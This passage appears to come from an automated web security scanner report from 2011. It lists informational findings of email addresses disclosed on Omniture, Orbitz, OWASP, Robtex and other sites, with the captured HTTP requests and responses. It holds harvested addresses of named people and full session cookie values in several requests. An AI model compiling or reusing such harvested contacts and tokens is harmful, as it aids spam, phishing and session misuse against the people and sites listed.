ats_emea@adobe.com

Request

Response

21.432. http://www.omniture.com/en/education/courses/sitesearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/sitesearch

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.433. http://www.omniture.com/en/education/courses/survey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/survey

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.434. http://www.omniture.com/en/education/courses/testandtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/testandtarget

Issue detail

The following email addresses were disclosed in the response:

ats@adobe.com
ats_emea@adobe.com

Request

Response

21.435. http://www.omniture.com/en/privacy/policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/policy

Issue detail

The following email addresses were disclosed in the response:

privacy@omniture.com
update@omniture.com

Request

Response

21.436. http://www.omniture.com/press/867 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/press/867

Issue detail

The following email address was disclosed in the response:

dariana@adobe.com

Request

Response

21.437. http://www.omniture.com/press/868 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/press/868

Issue detail

The following email addresses were disclosed in the response:

dariana@adobe.com
eric@adobe.com
laura.perez@hillandknowlton.com

Request

Response

21.438. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.439. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.440. http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/pagedef/content/legal/bestPriceGuarantee.jsp

Issue detail

The following email addresses were disclosed in the response:

CarLowPriceGuarantee@Orbitz.com
CarRedemption@orbitz.com

Request

GET /pagedef/content/legal/bestPriceGuarantee.jsp HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=57845851412C5B67BA02687379A48328; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 19:27:28 GMT
Content-Length: 8903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- IA Page ID: TODO
...[SNIP]...
<a href="mailto:CarLowPriceGuarantee@Orbitz.com">CarLowPriceGuarantee@Orbitz.com</a>
...[SNIP]...
<a href="mailto:CarRedemption@orbitz.com">CarRedemption@orbitz.com</a>
...[SNIP]...

21.441. http://www.orbitz.com/shared/js/lib/scriptaculous/src/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/scriptaculous/src/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "87e3-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 34787
Server: Apache
Date: Tue, 01 Feb 2011 15:22:44 GMT
Age: 8446
Connection: keep-alive
Cache-Control: private
Content-Length: 34787

// script.aculo.us controls.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

21.442. http://www.orbitz.com/shared/js/lib/scriptaculous/src/dragdrop.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/scriptaculous/src/dragdrop.js

Issue detail

The following email address was disclosed in the response:

sammi@oriontransfer.co.nz

Request

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "79c6-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 31174
Server: Apache
Date: Tue, 01 Feb 2011 15:22:44 GMT
Age: 8523
Connection: keep-alive
Cache-Control: private
Content-Length: 31174

// script.aculo.us dragdrop.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...

21.443. http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/pagedef/content/legal/lowFarePromise.jsp

Issue detail

The following email address was disclosed in the response:

ticketresolution@Orbitz.com

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=86AEB0323B18FBAB0DADEB251B027ED7; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:04:52 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 11984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- IA Page ID: TODO
...[SNIP]...
<li>To redeem your EC you will need to complete a new booking on Orbitz.com as outlined above and send an e-mail to ticketresolution@Orbitz.com containing the following information about your new booking:
<ul>
...[SNIP]...

21.444. http://www.owasp.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.owasp.org
Path:	/index.php

Issue detail

The following email addresses were disclosed in the response:

abraham.kang@owasp.org
edward@owasp.org
heleng@owasp.org
jim@manico.net
keith.turpin@owasp.org
lists.owasp.org@lists.owasp.org
tonyuv@owasp.org

Request

GET /index.php?title=Special:RecentChanges&feed=atom HTTP/1.1
Host: www.owasp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 07:49:57 GMT
Server: Apache/2.2.14 (Fedora)
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=wiki15Token;string-contains=wiki15LoggedOut;string-contains=wiki15_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Thu, 03 Feb 2011 07:41:13 GMT
Connection: close
Content-Type: application/xml; charset=UTF-8
Content-Length: 234685

<?xml version="1.0"?>
<?xml-stylesheet type="text/css" href="http://www.owasp.org/skins/common/feed.css?207"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
<id>http://www.owasp.org/index
...[SNIP]...
r'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email6 = <ins class="diffchange diffchange-inline">heleng@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
r'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email4 = <ins class="diffchange diffchange-inline">tonyuv@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email10 = <ins class="diffchange diffchange-inline">tonyuv@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
r'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email1 = <ins class="diffchange diffchange-inline">tonyuv@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
r'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email3 = <ins class="diffchange diffchange-inline">tonyuv@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
r'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email3 = <ins class="diffchange diffchange-inline">tonyuv@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
r'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email1 = <ins class="diffchange diffchange-inline">tonyuv@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email17 = <ins class="diffchange diffchange-inline">tonyuv@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
</td></tr>
<tr><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>| summit_session_attendee_email12 = tonyuv@owasp.org</div></td><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>| summit_session_attendee_email12 = tonyuv@owasp.org</div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_session_attende
...[SNIP]...
r'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email6 = <ins class="diffchange diffchange-inline">tonyuv@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
gt;</td></tr>
<tr><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>| summit_session_leader_email1 = abraham.kang@owasp.org</div></td><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>| summit_session_leader_email1 = abraham.kang@owasp.org</div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_session_leader_
...[SNIP]...
'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email12 = <ins class="diffchange diffchange-inline">tonyuv@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
r'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email1 = <ins class="diffchange diffchange-inline">abraham.kang@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
ker'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_leader_email1 = <ins class="diffchange diffchange-inline">abraham.kang@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
marker'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| operational_leader_email1 = <ins class="diffchange diffchange-inline">abraham.kang@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>| operationa
...[SNIP]...
r'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email2 = <ins class="diffchange diffchange-inline">jim@manico.net</ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
d:#cccccc&quot; align=&quot;center&quot;|Mailing list&lt;br&gt;[https://lists.owasp.org/mailman/listinfo/owasp-dotnet '''Subscribe here''']&lt;br&gt;[mailto:owasp-dotnet(at)lists.owasp.org@lists.owasp.org '''Use here''']</div></td><td class='diff-marker'> </td><td style="background: #eee; color:black; font-size: smaller;"><div>&nbsp; | style=&quot;w
...[SNIP]...
d:#cccccc&quot; align=&quot;center&quot;|Mailing list&lt;br&gt;[https://lists.owasp.org/mailman/listinfo/owasp-dotnet '''Subscribe here''']&lt;br&gt;[mailto:owasp-dotnet(at)lists.owasp.org@lists.owasp.org '''Use here''']</div></td></tr>



</tab
...[SNIP]...
'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_session_attendee_email12 = <ins class="diffchange diffchange-inline">keith.turpin@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_ses
...[SNIP]...
ff-marker'>+</td><td style="background: #cfc; color:black; font-size: smaller;"><div>| summit_attendee_email1 = <ins class="diffchange diffchange-inline">edward@owasp.org</ins></div></td></tr>
<tr><td class='diff-marker'>-</td><td style="background: #ffa; color:black; font-size: smaller;"><div>| summit_att
...[SNIP]...

21.445. http://www.rascals.eu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rascals.eu
Path:	/

Issue detail

The following email address was disclosed in the response:

office@rascals.eu

Request

GET / HTTP/1.1
Host: www.rascals.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:17:05 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 2371
Server: Apache/2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Rascals - Coming Soon</titl
...[SNIP]...
<a href="mailto:office@rascals.eu" title="Get In Touch With Us" id="git-button">
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,30359,34504,38844,38856,39489,41245,42484,45767,47055,47147,47283,47895,48051,48208,49979,50256,50391,50409,50628,50828,50930,51282,51416,51693,51699,51872,52218&Targets=30062,30058,52137&Values=31,43,60,82,90,100,152,200,264,32520,32876,33113,33155,33222,33232,33247,34023,34137,34172,34581,34634,34641,34777,34959,34960,35052,35154,35272,35370,35582,35643,35657,35682,35771,35921,36063,42667,66797,66867,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68295,68318,68322,68325,68326,68359,68363,68367,68376,102874,102875,103013,103016&RawValues=&/

Issue detail

The following email address was disclosed in the response:

admin@orbitz.com

Request

GET /event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,30359,34504,38844,38856,39489,41245,42484,45767,47055,47147,47283,47895,48051,48208,49979,50256,50391,50409,50628,50828,50930,51282,51416,51693,51699,51872,52218&Targets=30062,30058,52137&Values=31,43,60,82,90,100,152,200,264,32520,32876,33113,33155,33222,33232,33247,34023,34137,34172,34581,34634,34641,34777,34959,34960,35052,35154,35272,35370,35582,35643,35657,35682,35771,35921,36063,42667,66797,66867,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68295,68318,68322,68325,68326,68359,68363,68367,68376,102874,102875,103013,103016&RawValues=&/ HTTP/1.1
Host: www.revresda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=aebaa22-3554-1360392959-4; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 01 Feb 2011 15:25:46 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 617
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
admin@orbitz.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,30359,34504,38844,38856,39489,41245,42484,45767,47055,47147,47283,47895,48051,48208,49979,50256,50391,50409,50628,50828,50930,51282,51416,51693,51699,51872,52218&Targets=30062,30058,52137&Values=46,60,82,90,100,152,200,264,32520,32876,33113,33155,33222,33232,33247,34023,34137,34172,34581,34634,34641,34777,34959,34960,35052,35154,35272,35370,35582,35643,35657,35682,35771,35921,36063,42667,66797,67440,67898,67941,67944,68027,68032,68088,68179,68180,68236,68270,68295,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&/

Issue detail

The following email address was disclosed in the response:

admin@orbitz.com

Request

GET /event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,30359,34504,38844,38856,39489,41245,42484,45767,47055,47147,47283,47895,48051,48208,49979,50256,50391,50409,50628,50828,50930,51282,51416,51693,51699,51872,52218&Targets=30062,30058,52137&Values=46,60,82,90,100,152,200,264,32520,32876,33113,33155,33222,33232,33247,34023,34137,34172,34581,34634,34641,34777,34959,34960,35052,35154,35272,35370,35582,35643,35657,35682,35771,35921,36063,42667,66797,67440,67898,67941,67944,68027,68032,68088,68179,68180,68236,68270,68295,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&/ HTTP/1.1
Host: www.revresda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=aebaa22-3554-1360392959-4; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 01 Feb 2011 15:25:45 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 617
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
admin@orbitz.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

21.448. http://www.robtex.com/as/as15169.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as15169.html

Issue detail

The following email addresses were disclosed in the response:

AMS-PEERING-NL@tele2.com
abuse@arsys.es
abuse@ilk.net
abuse@ip-plus.net
abuse@star.net.uk
admred@arsys.es
helpdesk@ip-plus.net
ipnoc@welcomeitalia.it
ncc@gblx.net
network@dailymotion.com
noc@arsys.es
noc@bartels.de
noc@finecom.ch
noc@ilk.net
noc@star.net.uk
peering@altitudetelecom.fr
peering@arsys.es
peering@dailymotion.com
peering@ilk.net
peering@imp.ch
peering@ip-plus.net
peering@star.net.uk
peering@switch.ch
peering@welcomeitalia.it
peering@yacast.net
ripe@spacedump.net
support@eli.net

Request

GET /as/as15169.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS15169 Google , Inc
X-Meta-Keywords: AS information, AS15169, Google, Google, Inc
Title: AS15169 Google , Inc
X-Content-Length: 315778
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p4202 f1068 d0 b
X-Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
ETag: 9b9267af768ea2b08730f6b58babd66d
Y-Content-Length: 315778 315780
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 315780
Date: Thu, 03 Feb 2011 03:34:08 GMT
X-Varnish: 191303777
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="499,1031 496,1022 490,1014 480,1008 467,1004 453,1002 439,1004 427,1008 417,1014 410,1022 408,1031 410,1039 417,1047 427,1054 439,1058 453,1059 467,1058 480,1054 490,1047 496,1039" />
...[SNIP]...
</a> SWITCH , Swiss Education and Research Network Peering requests: <peering@switch.ch> Peering policy: http://www.switch.ch/network/peering_policy.html Present at CIXP (Geneva), Equinix Zurich, SwissIX (Zurich), AMS-IX</td>
...[SNIP]...
</a> SWISSCOM (Switzerland) Ltd IP-Plus Internet Backbone = Abuse issues abuse@ip-plus.net Operational issues helpdesk@ip-plus.net Peering requests peering@ip-plus.net Other info http://www.ip-plus.net =</td>
...[SNIP]...
</a> GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net</td>
...[SNIP]...
</a> ASN-ELIX Electric Lightwave, Inc. 800-622-4354, support@eli.net</td>
...[SNIP]...
</a> STARINTERNET Star Technology Services Limited http://www.star.net.uk/ Please contact peering@star.net.uk with any peering requests. For NOC issues noc@star.net.uk For abuse complaints abuse@star.net.uk</td>
...[SNIP]...
</a> IMPNET-AS ImproWare Network Services Peering request: <peering@imp.ch></td>
...[SNIP]...
</a> ASN-ALTITUDETELECOM Altitude Telecom SAS - For peering, please mail peering@altitudetelecom.fr -</td>
...[SNIP]...
</a> ASILK ILK Internet GmbH, Karlsruhe, Germany = contact for peering requests: peering@ilk.net contact for operational issues: noc@ilk.net contact for spam and abuse issues: abuse@ilk.net =</td>
...[SNIP]...
</a> Versatel AS for the Trans-European Tele2 IP Transport backbone - For peering requests please contact AMS-PEERING-NL@tele2.com -</td>
...[SNIP]...
</a> BARTELS-AS Bartels System GmbH Erding Germany Technical contact: noc@bartels.de</td>
...[SNIP]...
</a> FINECOM Telecommunications AG IP Services Backbone Robert Walser Platz 7 CH-2501 Biel/Bienne Switzerland Phone +41 32 559 99 Fax +41 32 559 99 90 http://www.finecom.ch mailto:noc@finecom.ch</td>
...[SNIP]...
</a> AS_ARSYS-EURO-1 arsys.es = Peering requests peering@arsys.es Operational issues admred@arsys.es / noc@arsys.es Spam and abuse issues abuse@arsys.es Other info http://www.arsys.es =</td>
...[SNIP]...
</a> ASN-WELCOMEITALIA Welcome Italia S.p.A. = Routing and peering requests 'peering@welcomeitalia.it' Operational issues 'ipnoc@welcomeitalia.it' Spam and Abuse issues 'ipnoc@welcomeitalia.it' = Welcome Italia S.p.A.</td>
...[SNIP]...
</a> YACAST-AS - YACAST Media AS http://www.yacast.net - Peering requests/info should be sent to : peering@yacast.net -</td>
...[SNIP]...
</a> SPACEDUMP-AS SpaceDump Networks This ASN is located on STHIX at Tulegatan Stokab And also SOLIX at Tulegatan Stokab For peering issues contact ripe@spacedump.net -</td>
...[SNIP]...
</a> DAILYMOTION S.A. - For peering related business, please mail peering@dailymotion.com For any other business, please mail network@dailymotion.com -</td>
...[SNIP]...

21.449. http://www.robtex.com/as/as26415.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as26415.html

Issue detail

The following email addresses were disclosed in the response:

ncc@gblx.net
noc@kornet.net
nsdsix@starhub.com
support.outsourcing@visiant.it

Request

GET /as/as26415.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS26415 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS26415, VERISIGN-AS, VeriSign, Inc
Title: AS26415 VERISIGN-AS VeriSign, Inc
X-Content-Length: 557340
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p4225 f3757 d0 b
X-Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
ETag: c88dbbe84376e6fb0f5ccc2bb1bad1f7
Y-Content-Length: 557340 557340
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
